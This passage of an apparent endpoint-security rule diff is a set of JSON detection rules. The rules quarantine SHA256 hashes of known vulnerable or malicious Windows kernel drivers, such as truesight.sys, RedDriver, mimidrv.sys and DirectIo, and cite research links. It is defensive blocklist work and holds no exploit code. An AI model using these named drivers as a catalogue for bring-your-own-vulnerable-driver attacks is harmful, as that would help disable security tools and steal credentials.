"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821328Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "820022d1438b3b41578a556cc16c149f11c06bbee4dd31ef605cbec0fe7e4618", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1d4e49cb-7181-5830-b4ce-f76303ae36e3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.986119Z", + "creation_date": "2026-03-23T11:45:29.986121Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.986126Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "625fce937dd4fed61bc3a0475e10b6f05d9061c99b5335bf3f33dc43511300b3", + "comment": "Malicious Kernel Driver related to RedDriver (aka telephonuAfY.sys, spwizimgVT.sys, 834761775.sys, reddriver.sys, typelibdE.sys, NlsLexicons0024UvN.sys and ktmutil7ODM.sys) [https://blog.talosintelligence.com/undocumented-reddriver/] [authentihash SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1d56f6b5-c75e-5eaa-84de-a251561e8e81", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495133Z", + "creation_date": "2026-03-23T11:45:31.495135Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495141Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6d2298b33a526068d60e9964778cdf7b0467e0c272c89e7f647f91df04cfb2aa", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1d637982-ac56-5c8a-80dd-83cb4f8eb2b1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967206Z", + "creation_date": "2026-03-23T11:45:29.967210Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.967218Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "eb6f186c9bf73b0efd227d99e09659c321f0414bda568e99ee9a3863dc1a380d", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1d6d53ac-8ed7-5ee2-90be-009239ee6e14", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154996Z", + "creation_date": "2026-03-23T11:45:31.154998Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155003Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3b08e1ce175b043fe35518554c6e9d9645cd4f454a76bd38303a0237de73e86c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1d6eb45d-59bd-568f-8eb7-991a4f20b2cf", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622633Z", + "creation_date": "2026-03-23T11:45:29.622635Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622641Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "673b63b67345773cd6d66f6adcf2c753e2d949232bff818d5bb6e05786538d92", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1d792f90-9a2e-5c69-bbb8-21d368b944b0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150374Z", + "creation_date": "2026-03-23T11:45:31.150376Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150381Z", + "rule_level": null, 
+ "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e659535a0d408d81ffffe237c17a21f30def814136bdf391fe73564fb131a8ab", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1d7f8b5d-903e-5bb7-bd8b-a92a48371f50", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829911Z", + "creation_date": "2026-03-23T11:45:31.829913Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.829919Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "001a03bdec4bf659f732b2d858e1a70b40446a455bc37d8d4e5c935f3ef32358", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1d802545-1d7d-5510-b8f6-4f599ee02042", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969309Z", + "creation_date": "2026-03-23T11:45:29.969311Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969316Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d5c4ff35eaa74ccdb80c7197d3d113c9cd38561070f2aa69c0affe8ed84a77c9", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1d81ec6a-22df-583d-bcc7-192b72381ac7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615290Z", + "creation_date": "2026-03-23T11:45:29.615292Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615297Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"1f210a62de46c5acb868a083465b94287331ec28acd3b269e64ab6c3f372021f", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1d89e9ac-f887-5d1e-8ea8-1e840349ff2b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613136Z", + "creation_date": "2026-03-23T11:45:29.613138Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613144Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bdcacee3695583a0ca38b9a786b9f7334bf2a9a3387e4069c8e6ca378b2791d0", + "comment": "ASUS vulnerable UEFI Update Driver (aka AsUpIO64.sys and GVCIDrv64.sys) [https://codeinsecurity.wordpress.com/2016/06/12/asus-uefi-update-driver-physical-memory-readwrite/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1da640c3-dab8-593b-8091-43be9689d8bc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 
1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159652Z", + "creation_date": "2026-03-23T11:45:31.159655Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159664Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "68ae2bd91421eb9fac0412e392af4b7f9ce1cc077cb069d904db243e7d8d7e66", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1daf158f-dd39-59b9-82e8-595b279f79eb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968239Z", + "creation_date": "2026-03-23T11:45:29.968241Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968247Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "16768203a471a19ebb541c942f45716e9f432985abbfbe6b4b7d61a798cea354", + "comment": "ENE Technology Inc Vulnerable I/O Driver (aka ene.sys) 
[https://swapcontext.blogspot.com/2020/08/ene-technology-inc-vulnerable-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1db55043-ae03-5402-86d7-146f720264cf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154041Z", + "creation_date": "2026-03-23T11:45:31.154043Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154049Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "da7fc3aa13917d1d9dddae0f0353fdc5423a281a6c41cb12d7aec62e9128fad6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1dc54178-c0d3-5514-9f4b-7d6d243fcb8a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620548Z", + "creation_date": 
"2026-03-23T11:45:29.620550Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620555Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "49f75746eebe14e5db11706b3e58accc62d4034d2f1c05c681ecef5d1ad933ba", + "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1dcf377a-baaa-5b5b-bd83-d7b93f7a0526", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983404Z", + "creation_date": "2026-03-23T11:45:29.983406Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983411Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "72b99147839bcfb062d29014ec09fe20a8f261748b5925b00171ef3cb849a4c1", + "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1dd5449d-5ab1-5fd0-95ae-859a0adf3e7f", + "test_maturity_current_count": 
0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820859Z", + "creation_date": "2026-03-23T11:45:30.820861Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820866Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "03680068ec41bbe725e1ed2042b63b82391f792e8e21e45dc114618641611d5d", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1dd5ca46-cc64-5208-a6f9-a446d9fb49c5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.467736Z", + "creation_date": "2026-03-23T11:45:30.467739Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.467748Z", + "rule_level": null, + "rule_level_override": null, + 
"rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "91e64a75caa5015cb1d874372e4fdfefa506de680a962fdd97b83206bdf1e27e", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1dd8b129-2f9f-5617-81f5-00ad709be9db", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.466523Z", + "creation_date": "2026-03-23T11:45:30.466526Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.466535Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d50cb5f4b28c6c26f17b9d44211e515c3c0cc2c0c4bf24cd8f9ed073238053ad", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1dd9e8f4-f2bc-5813-9ccc-8d07c6179b05", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.463728Z", + "creation_date": "2026-03-23T11:45:30.463732Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.463740Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2faf95a3405578d0e613c8d88d534aa7233da0a6217ce8475890140ab8fb33c8", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1dddbd04-2ce2-5a83-9c9a-d0ee7c989db9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.833452Z", + "creation_date": "2026-03-23T11:45:30.833455Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.833463Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "12dd733db66f745c5401a0470343f165767a6381b6789e45ceef1ab4c6e33983", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1de14c1e-662a-58d6-b0cd-1297f6cac62a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141237Z", + "creation_date": "2026-03-23T11:45:31.141239Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141245Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "438baa1b1dffc3c86b75c6506ba92a53741cd9d5fd7e6460b6e7fd151e25f51d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1de217d1-f1f8-5bdb-923b-3da5c275b1c6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818906Z", + "creation_date": 
"2026-03-23T11:45:30.818908Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818914Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d9674a1364fde6b5e7fb1770bdebb8db7de8e15f3c976e5c5102775c95452967", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1dfb65ca-96c4-5e34-a158-5b6f7ef5710c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828703Z", + "creation_date": "2026-03-23T11:45:30.828705Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828710Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a18bb92e104e9f6de178c88f72866b365d9ec5d0d3868b0539900dfa3d25ed39", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"1dffe9b1-2cf3-55ee-a109-8f5a07a1d918", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982520Z", + "creation_date": "2026-03-23T11:45:29.982522Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982528Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "64f9e664bc6d4b8f5f68616dd50ae819c3e60452efd5e589d6604b9356841b57", + "comment": "Vulnerable Kernel Driver (aka 1.sys) [https://www.loldrivers.io/drivers/a5792a63-ba77-44ac-bd4a-134b24b01033/] [authentihash SHA256]", + "source": 